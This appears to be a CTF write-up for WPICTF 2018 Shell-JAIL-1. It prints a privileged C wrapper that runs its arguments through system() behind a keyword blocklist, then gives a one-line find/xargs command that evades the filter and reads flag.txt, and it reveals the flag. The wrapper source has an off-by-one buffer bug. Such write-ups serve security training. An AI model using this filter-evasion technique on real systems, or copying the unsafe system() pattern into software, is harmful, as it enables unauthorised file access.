Writeup: WPICTF 2018 - Shell-JAIL-1

Download the login private key, then run:

ssh -p 31337 -i login shjail@shelljail1.wpictf.xyz

The machine is in mounted as read-only and contains this files for the challenge:

access access.c flag.txt

1
2
559f7886842b:/home/pc_owner$ cat flag.txt
cat: can't open 'flag.txt': Permission denied

So, obviously the flag is protected but access can be used to print the content of flag.txt.

The ELF is compiled from this source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>

char *gen_cmd(int argc, const char **argv){
size_t total_size = 1;
for(int it = 1; it < argc; it++){
total_size+= strlen(argv[it]);
}
char *ret = malloc(total_size);
total_size = 0;
for(int it = 1; it < argc; it++){
size_t len = strlen(argv[it]);
memcpy(ret+total_size, argv[it], len);
total_size+= len;
ret[total_size] = ' ';
total_size++;
}
ret[total_size] = '\0';
return ret;
}

int filter(const char *cmd){
int valid = 1;
valid &= strstr(cmd, "*") == NULL;
valid &= strstr(cmd, "sh") == NULL;
valid &= strstr(cmd, "/") == NULL;
valid &= strstr(cmd, "home") == NULL;
valid &= strstr(cmd, "pc_owner") == NULL;
valid &= strstr(cmd, "flag") == NULL;
valid &= strstr(cmd, "txt") == NULL;
return valid;
}


int main(int argc, const char **argv){
setreuid(UID, UID);
char *cmd = gen_cmd(argc, argv);
if (!filter(cmd)){
exit(-1);
}
system(cmd);

So we can’t just use cat flag.txt. But we can still use cat:

./access "find . -type f | xargs cat"

Flag

wpi{Many_WayS_T0_r3Ad}